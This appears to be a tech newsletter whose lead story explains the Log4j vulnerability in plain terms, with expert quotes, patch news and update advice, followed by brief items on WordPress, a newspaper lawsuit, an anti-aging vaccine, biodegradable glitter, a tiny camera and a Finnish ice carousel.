A mild-mannered bit of code has the Internet in an uproar.
On December 9th, security researchers identified a vulnerability in Log4j, a Java library within the open-source Apache logging framework. Log4j (also called Log4Shell) allows computers to capture and record all activity within an application.
What’s happened is that researchers discovered an existing exploit of this code, where someone can send a malicious string of code to a server or change a device name to include the string. When the receiving server receives that code or when the device pings that server, that code gets added to the server logs just like any other legitimate server request. Sending malicious code to an unpatched server could allow whoever sent the code to access to that server, either to review information or plant their own code.
Security researchers sounded the alarm because of the havoc this exploit may cause if companies don’t immediately patch their systems. According to Wired, Free Wortley, CEO of data security company LunaSec, called Log4j “a design failure of catastrophic proportions.”
Why is this a big deal? Companies that don’t update the code on their servers leave themselves open to attack. This, in turn, could impact your ability to access information online, order products, or use an app on your phone. And all of this could cost a company millions of dollars in lost revenue. But in a worst-case scenario, if a malicious actor gained access to critical servers, they could cripple an already overburdened supply chain, create havoc at hospitals, or impact electrical grids, water supplies, and other essential services.
The problem is particularly noteworthy because the code, and the ability to insert a malicious string, already exists in software products created by major companies (such as Oracle, IBM, Amazon Web Services, Microsoft, and Google). Researchers discovered that cloud services like Steam and many popular games like Minecraft are vulnerable as well.
Brian Fox of security company Sonatype suggested to the BBC that this exploit of corporate servers is “akin to someone figuring out that mailing a letter into your postbox, with a specific address written on it, allows them to open all your doors in your house.”
One security researcher posted a redacted image on Twitter showing how easy it was to run an exploit on an iPhone by simply changing the name in the settings to a new string, which then triggered a response (a ping) from Apple servers.
Another researcher was able to accomplish a similar action with Tesla.
And despite all of the warnings, the use of this exploit has spread like wildfire. Online security provider Check Point noted that they have prevented over 1.25 million attempts to exploit this vulnerability while security experts at Sophos say they have “already detected hundreds of thousands of attempts since December 9 to remotely execute code.”
Even the U.S. Government is sounding the alarm. Jen Easterly, Director of the Cybersecurity and Infrastructure Security Agency (CISA), said on December 13 that the Log4j exploit is “one of the most serious I’ve seen in my entire career, if not the most serious.” In a separate statement, she also said the government is doing everything it can to mitigate the fallout, and in light of news that some state actors are attempting to use the exploit, ZDNet reported that the agency has ordered all civilian federal agencies to patch their systems by December 24.
How to stop Log4j from breaking the Internet
The good news is that many companies are already applying patches to their systems and products. For example, Amazon published an update about their efforts to protect AWS servers and Google Cloud issued a security advisory.
The real concern is with smaller companies that may not be running the most up-to-date software and may not be monitoring their security closely. Although the Apache Software Foundation has already released two patches for their software so far, each individual company needs to ensure the patch is applied within their own products, and then individuals and companies using these products will need to update their software.
As Wired noted, “Less fastidious organizations or smaller developers who may lack resources and awareness will be slower to confront the Log4Shell threat.”
Another thing that worries security experts is the potential hesitancy to deal with the problem. “We’re seeing a lot of enterprises afraid to patch without testing,” Jake Williams, an incident responder and former NSA hacker, told Wired. “That’s the wrong approach in this case.”
Even if you don’t write code, you still have a role to play in mitigating the damage from Log4j. Make sure your devices are running the most current operating system and that all of your individual applications are up-to-date.
For anyone wanting (or needing) to learn more, in the spirit of crowdsourcing solutions, Tech Solvency has a detailed page explaining the issues, linking to multiple technical analysis sites, offering tips for detection and remediation, and providing a list of all sites affected so far and their status.
In other news
- The State of the Word for WordPress. Each year Matt Mullenweg, co-founder of WordPress and CEO of Automattic, delivers a keynote address known as the State of the Word discussing all things WordPress. This year, Mullenweg explored the past year of WordPress initiatives and highlighted features coming in WordPress 5.9, including new block functionality and full-site editing. He also covered broader topics affecting the tech landscape, including Web 3.0 and the decentralized web, mergers and partnerships, and the growth of open source as a software of choice. Watch the official State of the Word 2021 recording including a lively interactive question and answer session, or discover what has the WordPress community talking over on Twitter #ILoveWP.
- 200 newspapers are suing the search and social giants. Google and Facebook have been undermining local newspapers by manipulating the digital ad market, according to a new lawsuit. A group of 30 newspaper companies operating hundreds of newspapers want to recover past damages as well as establish a new system in which they can thrive. Their complaint echoes many of the antitrust suits filed against Google, but there are some significant differences between their claims and what was asserted in previous litigation. WPTavern noted that many of the small newspapers in this consolidated lawsuit have used WordPress (or something similar) for years, and these lawsuits allege that AMP pages brought 40% less revenue to publishers — suggesting an algorithm disparity between their platforms is at play here.
- A vaccine for aging to treat disease. The Japan Times reports a team of Japanese scientists has developed a vaccine designed to halt aging. When cells age, or experience arterial stiffening, this leads to the spread of age-related diseases. But the vaccine enables the body to counter the process. The scientists isolated a protein to make the vaccine from what’s known as senescent, or ‘zombie,’ cells. Once injected, the body removes damaged cells instead of letting them continue to age. The Japan Times reports the Juntendo University team hopes to use the vaccine to halt the progress of diseases including diabetes, arterial conditions, and cancer.
- Plant-based glitter won’t rain pollution on your parade. Nothing brightens up a celebration quite like throwing huge handfuls of glitter. However, glitter often ends up suspended in the air or raindrops, scattered across the landscape, and buried deep in our oceans. Researchers at the University of Cambridge may have a solution to the glitter problem: a biodegradable version using cellulose that’s made using less energy. When cellulose, a substance found in plant walls, is assembled into crystals, it reflects light just like glitter, and could be easily extracted from materials that would otherwise be trash, like wood pulp, fruit skins, and coffee grounds. Figuring out how to get these microscopic crystals to assemble into vibrant colors in large quantities is tricky, so it may be a few more years before plant-based glitter becomes a staple at your local Pride parade.
- A camera the size of a grain of salt. Who would have thought that cameras could be this small? That’s right, the latest to appear is incredibly tiny — the same size as a grain of salt. It produces quality images with no blur or distortions. With 1.6 million cylindrical posts on its surface, it manages to capture full-color photos similar to high-quality lenses half a million times bigger. Computer software uses machine learning techniques and other signal processing algorithms to reduce digital distortion without losing any sharpness or reducing image resolution. No word yet on how soon it will be before you just sprinkle these cameras on your scrambled eggs prior to your next colonoscopy.
- High-tech, Finnish-style. What do you get when you combine advanced GPS, solar tech, cold weather, outboard motors, and saunas? A giant ice carousel, of course! Finnish inventor Janne Käpylehto set his summer cottage free by carving out a massive circle in the ice and then spun lights and a portable sauna in circles around it.
Tip of the week
As more devices connect to the Internet, keeping your apps and firmware updated is crucial. Most devices have an auto-update setting, but it won’t always work as promised. To minimize your risk of threats, set a bi-weekly appointment on your calendar to check for updates on all devices.
Start by checking for app updates on your smartphone and computer. Next, look for operating system updates. Don’t forget your virus software! Then check your streaming stick, tablet, e-reader, activity tracker, and smartwatch. Have a website? Check for updates to your CMS and WordPress plugins, and don’t forget to create a backup. Treat this appointment with the highest priority, and you’ll be much less vulnerable to hacks.
[NEWS] Online security threat Log4j is small but mighty .